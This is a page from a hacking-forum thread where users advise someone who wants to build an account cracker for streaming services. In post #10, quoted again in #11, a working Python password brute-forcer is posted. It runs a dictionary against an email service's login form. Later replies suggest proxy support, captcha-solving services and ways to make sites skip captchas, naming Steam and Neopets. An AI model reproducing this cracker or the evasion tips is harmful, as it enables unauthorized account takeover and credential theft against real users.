Page 1 of 3 123 LastLast
Results 1 to 15 of 35
  1. #1
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4

    Lightbulb Coding a Cracker

    Hello everyone, I want to code an account cracker for netflix or spotify or whatever for educational purposes ( I know sentry mba exist that's why it's educational) to understand how it's done and what libs and functions to use. I know the basic syntax and have some knowledge of python 3, javascript, C# and C++. I have looked around on the internet for some info, but since cracking accounts isn't actually very legal I didn't find much about which language is best to do such a thing and besides there are tools coded in C#, C++ and python so I don't know which to use. It's probably partly preference but what is the best language to code an account cracker in ? and what are the libs/functions I need to use. btw I am using a mac so windows.h and that kinda stuff in c++ doesn't work. Also, is perl worth learning for cracking ?

    Thank you for reading and helping me out <3
    Last edited by BlueCow; 12-18-2016 at 02:49 PM. Reason: added some info.

  2. The Following User Says Thank You to BlueCow For This Useful Post:

    K4LI (12-19-2016)

  3. #2
    K4LI's Avatar
    Join Date
    Apr 2016
    Gender
    male
    Posts
    403
    Reputation
    90
    Thanks
    74
    My Mood
    Fine
    Quote Originally Posted by BlueCow View Post
    Hello everyone, I want to code an account cracker for netflix or spotify or whatever for educational purposes ( I know sentry mba exist that's why it's educational) to understand how it's done and what libs and functions to use. I know the basic syntax and have some knowledge of python 3, javascript, C# and C++. I have looked around on the internet for some info, but since cracking accounts isn't actually very legal I didn't find much about which language is best to do such a thing and besides there are tools coded in C#, C++ and python so I don't know which to use. It's probably partly preference but what is the best language to code an account cracker in ? and what are the libs/functions I need to use. btw I am using a mac so windows.h and that kinda stuff in c++ doesn't work. Also, is perl worth learning for cracking ?

    Thank you for reading and helping me out <3
    Seems very interesting, I can't help you so far but I'd like you to keep us updated in your work
    Good luck with that

  4. #3
    ETHerthethaethaetheh's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    929
    Reputation
    40
    Thanks
    225
    My Mood
    Psychedelic
    Cool! Good luck and keep us updated!

  5. #4
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by K4LI View Post
    Seems very interesting, I can't help you so far but I'd like you to keep us updated in your work
    Good luck with that

    Quote Originally Posted by gusitis00 View Post
    Cool! Good luck and keep us updated!
    I'll do some more research and update if I find anything useful, Thanks for the support.

  6. #5
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Alright, so I'm not sure about this I think I should start off by using the cURL library : website
    I'm gonna try to use this to visit a web page, enter some values stored in variables and retrieve information on the webpage to see if the credentials are valid or not. Also, for those on Windows that are using Visual Studio I found a good text tutorial that explains how to install, link, include and use libcurl, you can find it here.
    I'm not an awesome programmer so I might fail but it looks like cURL can do all of this.
    Last edited by BlueCow; 12-22-2016 at 03:08 AM.

  7. #6
    Azuki's Avatar
    Join Date
    Mar 2015
    Gender
    female
    Location
    京都市
    Posts
    1,110
    Reputation
    195
    Thanks
    20,258
    My Mood
    Angelic
    i feel like something like this should be coded in c#.
    maybe thats just me being biased as a c# programmer but still.

    BTC: 1LLm4gaPYCZsczmi8n1ia1GsEMsDRs2ayy
    ETH: 0x7d8045F6e452045439c831D09BAB19Bf9D5263EE



  8. #7
    MaxGen's Avatar
    Join Date
    May 2016
    Gender
    male
    Location
    Up ur mom
    Posts
    138
    Reputation
    10
    Thanks
    40
    My Mood
    Chatty
    honestly most of the time these shitty crackers people sell are coded in vb. personally i think vb is the pussy of coding but whatever. you should be fine with any .net languages so c# would also be fine. GL with cURL i havent done anything with that before
    Last edited by MaxGen; 12-30-2016 at 02:34 PM.

  9. #8
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by MaxGen View Post
    honestly most of the time these shitty crackers people sell are coded in vb. personally i think vb is the pussy of coding but whatever. you should be fine with any .net languages so c# would also be fine. GL with cURL i havent done anything with that before
    That is exactly why I don't want to use VB or C# but it seems like they are the easiest to code a cracker.

  10. #9
    MaxGen's Avatar
    Join Date
    May 2016
    Gender
    male
    Location
    Up ur mom
    Posts
    138
    Reputation
    10
    Thanks
    40
    My Mood
    Chatty
    Quote Originally Posted by BlueCow View Post
    That is exactly why I don't want to use VB or C# but it seems like they are the easiest to code a cracker.
    you know what if you dont need great graphical interface you should think about python. its great you can do almost anything with that

  11. The Following User Says Thank You to MaxGen For This Useful Post:

    BlueCow (01-04-2017)

  12. #10
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    553
    Reputation
    21
    Thanks
    2,639
    I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

    Code:
        import requests, sys
        from bs4 import BeautifulSoup
    
        ses = requests.Session()
        login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')
    
        soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
        loginDict = {}
        for u in soup_login:
            if u.has_attr('value'):
                loginDict[u['name']] = u['value']
        loginDict['username'] = 'hackmereddit@gm*****.uk'
    
        with open('dict.txt', 'r') as dict:
            for word in dict:
                word = word.strip()
                loginDict['password'] = word
                resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
                print(word)
                if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                    print(word)
                    print(resp.cookies)
                    sys.exit()

  13. #11
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by Nimboso View Post
    I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

    Code:
        import requests, sys
        from bs4 import BeautifulSoup
    
        ses = requests.Session()
        login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')
    
        soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
        loginDict = {}
        for u in soup_login:
            if u.has_attr('value'):
                loginDict[u['name']] = u['value']
        loginDict['username'] = 'hackmereddit@gm*****.uk'
    
        with open('dict.txt', 'r') as dict:
            for word in dict:
                word = word.strip()
                loginDict['password'] = word
                resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
                print(word)
                if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                    print(word)
                    print(resp.cookies)
                    sys.exit()
    Nice !! Would it be possible to add captcha bypass and proxy support using some libs though ?! If so, I'm going straight for python, besides I did a bit of research and although it is not really easy to do it is possible to make gui's in python.

  14. #12
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    553
    Reputation
    21
    Thanks
    2,639
    Quote Originally Posted by BlueCow View Post
    Nice !! Would it be possible to add captcha bypass and proxy support using some libs though ?! If so, I'm going straight for python, besides I did a bit of research and although it is not really easy to do it is possible to make gui's in python.
    Yeah its relatively easy to add socks proxy support. Captcha bypassing is harder though. There are OCR libraries that can bypass basic captcha, but if they use recaptcha you'll have to go with a service like DeathByacapthca, but thats the same for every language.

    A large part of bypassing captchas is finding a way to make the web app not require it. I think I found something for steam but I need to keep testing, and I've definitely found one for neopets lol.
    Last edited by Nimboso; 01-04-2017 at 12:45 PM.

  15. The Following User Says Thank You to Nimboso For This Useful Post:

    BlueCow (01-05-2017)

  16. #13
    New's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Location
    Location:
    Posts
    2,599
    Reputation
    386
    Thanks
    4,710
    My Mood
    Angelic
    Quote Originally Posted by MaxGen View Post
    i think vb is the pussy of coding but whatever.
    It has simpler syntax. Apart from that, anything achieved in C# can be achieved in vb.net and vice versa.
    New

    Current Project:
    SimpleExaltHack

    Outdated stuff I made in the past:
    Famebot
    Clientless tradebot
    RotMG ping checker
    Zautonexus crack

  17. #14
    BlueCow's Avatar
    Join Date
    Oct 2016
    Gender
    male
    Location
    UK
    Posts
    113
    Reputation
    10
    Thanks
    4
    So, I think I'm gonna go for pyhton and try to make a v1 without proxies and if it turns out not too bad I'll make a v2. Thanks for your help guys ! Btw, I'm on mac and I was thinking of going for Pycharm as the IDE (https://www.jetbrains.com/pycharm/?fromMenu) does anyone know if it's good or if I should use something else ? Thanks !!

  18. #15
    Nimboso's Avatar
    Join Date
    Sep 2015
    Gender
    male
    Posts
    553
    Reputation
    21
    Thanks
    2,639
    Quote Originally Posted by BlueCow View Post
    So, I think I'm gonna go for pyhton and try to make a v1 without proxies and if it turns out not too bad I'll make a v2. Thanks for your help guys ! Btw, I'm on mac and I was thinking of going for Pycharm as the IDE (https://www.jetbrains.com/pycharm/?fromMenu) does anyone know if it's good or if I should use something else ? Thanks !!
    Pycharm is a good one, it's what I use.

  19. The Following User Says Thank You to Nimboso For This Useful Post:

    BlueCow (01-08-2017)

Page 1 of 3 123 LastLast

Similar Threads

  1. [WTS] Minecraft Cracker / Gift Code Methods / MC Accounts / Poison Plugin
    By Sandwich in forum Selling Accounts/Keys/Items
    Replies: 17
    Last Post: 06-07-2014, 03:15 AM
  2. How long till a code cracker comes out XD
    By santasfoot in forum Rust Discussions & Help
    Replies: 0
    Last Post: 01-25-2014, 10:53 PM
  3. [Solved] AQW code crackers...
    By vincelee1998 in forum Adventure Quest Worlds (AQW) Help
    Replies: 1
    Last Post: 12-15-2013, 03:54 AM
  4. [WTS] Selling Brute Force/Cracker Source Code
    By johnstalie in forum Selling Accounts/Keys/Items
    Replies: 3
    Last Post: 07-05-2013, 08:10 PM
  5. Sell pw cracker for runescape for retail code!!!
    By Maartenthebest in forum Trade Accounts/Keys/Items
    Replies: 11
    Last Post: 09-04-2007, 08:34 PM

Tags for this Thread